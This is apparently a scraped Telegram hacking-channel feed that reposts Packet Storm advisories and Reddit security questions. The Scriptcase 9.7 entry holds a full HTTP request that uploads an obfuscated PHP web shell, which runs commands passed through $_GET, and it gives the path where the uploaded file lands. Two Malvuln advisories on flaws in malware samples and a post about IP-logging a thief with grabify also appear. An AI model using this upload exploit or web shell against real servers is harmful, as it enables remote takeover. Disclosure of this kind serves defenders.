Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.6K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Hupigon.haqj Unquoted Service Path

https://2.bp.blogspot.com/-ZkI_NEmJcds/WWlvjl_lr_I/AAAAAAAAIQo/28S1w7dyZRc0PebCQs4RPEz7Silw5ZbpgCLcBGAs/s1600/h95.png
Backdoor.Win32.Hupigon.haqj malware suffers from an unquoted service path vulnerability.

MD5 | dbd99bf469132a6a5a0d9e45079f7eae

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/d9542df20f8df457747451dd9e16d1c0.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Hupigon.haqj
Vulnerability: Insecure Service Path
Description: The malware creates a service with an unquoted path. Third party attackers who can place an arbitrary executable under c:\ drive can potentially undermine the integrity of the malware by having it run theirs instead with SYSTEM privs.
Family: Hupigon
Type: PE32
MD5: d9542df20f8df457747451dd9e16d1c0
Vuln ID: MVID-2022-0557
Disclosure: 04/18/2022

Exploit/PoC:
C:\dump>sc qc "Outlook Express"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Outlook Express
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Express.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Outlook Express
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Scriptcase 9.7 Shell Upload

https://2.bp.blogspot.com/-9-swdJydXNw/WWlu-Z7JktI/AAAAAAAAIJ0/CxXmre-Va7QW9KRwpgdSNcn8lp40qwLtQCLcBGAs/s1600/h117.png
Scriptcase version 9.7 suffers from a remote shell upload vulnerability.

MD5 | 1a68d2be31fdc3bda2232ba70472bcb0

Download
# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019

# Proof of Concept:

POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close

------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"

gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———

# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.TScash.c Insecure Permissions

https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
Trojan.Win32.TScash.c malware suffers from an insecure permissions vulnerability.

MD5 | c831857f2b0c2d4961751fe6ce1c1177

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/9d18d318e017b513b9c6cd193ccdc6ff.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.TScash.c
Vulnerability: Insecure Permissions
Description: The malware writes a PE file with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Family: TScash
Type: PE32
MD5: 9d18d318e017b513b9c6cd193ccdc6ff
Vuln ID: MVID-2022-0555
Dropped files: tscash.exe
Disclosure: 04/18/2022

Exploit/PoC:
C:\>cacls tscash.exe
C:\tscash.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C

C:\>dir tscash.exe
Volume in drive C has no label.

Directory of C:\

02/18/2013 04:48 PM 49,664 tscash.exe
1 File(s) 49,664 bytes

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
tracking phones ?

Watching this show where this site is tracking this person and the person turned the phone off but they were able to track the simcard with the phone off.

Is that ?

View Poll

submitted by /u/reddituser11992288
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Stolen Oculus Quest Tracking Advice

Hello, recently, I had my oculus quest headset stolen from me. Whoever stole it is active on my account. I was considering using grabify to send a link to my account and hope they click on the link to get the IP and find out its general area. I am not too familiar with tracking IPs and was wondering if there is any other way I could possibly track down my headset. Any ideas or advice would be appreciated, even if it is an explanation for why it isn't possible.

submitted by /u/2021Ethan
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Ports 445 and 139 open

I was doing an nmap scan of a local network and noticed that one of the computers was running services that are listening on ports 139 and 445 (skype and runtime broker), and know from my albeit limited experience that netbios and smb can have exploitable vulnerabilities. Are these uses for these ports needed, would it be the smart choice to close them?

submitted by /u/g3t_r3kd02
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Imprisoned Hackers

just listened to Aaron Swartz story and its a shame that talented hackers are imprisoned.

Maybe the govt should consider a Hacker Prison group to put hackers to use hacking Russia or China to reduce sentence.

submitted by /u/Doug6388
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Responsible Disclosure info.php

What's up everyone. I'm quite new to doing Responsible Disclosures and I was wondering if anyone could help answer my question.

I found the /phpinfo.php page in of the domains I was testing was public. Now, the organization I'm doing these disclosures for specifies that reporting info.php files with version information isn't necessarily important enough for them to take action, however "one possible exception in this scenario is when the version information reveals that the system uses software that contains known vulnerabilities".

So the thing is, within the info.php file a lot of system information can be read, including directory paths, the server's real IP and installed modules running on older versions with known CVE's. My question: is it possible for me to prove these vulnerabilities are still active and are of possible risk to the system? Some of the modules (some with vulnerabilities) installed are things like BZip2 (CVE-2022-23219), Libxml (CVE-2017-7375), Iconv/Glibc (CVE-2022-23219), MySQL (https://imgur.com/a/pVP94ZX) and many more.

I have practically no knowledge on PHP (version 7.3.33, no known vulnerabilities), and I'm not sure how to proceed with this information; do I report this or are these vulnerabilities of no risk? Do I first show these vulnerabilities are able to be exploited? Is other information on the system (file paths, IP-addresses, and more) able to be exploited by potential attackers?

I'm really sorry for my naivety, I'm trying to learn:)

submitted by /u/lopdrul
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
$1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….

After several emails with the security team which also includes depression & demotivat and the HITCON team, the companyContinue reading on Medium »
Read more...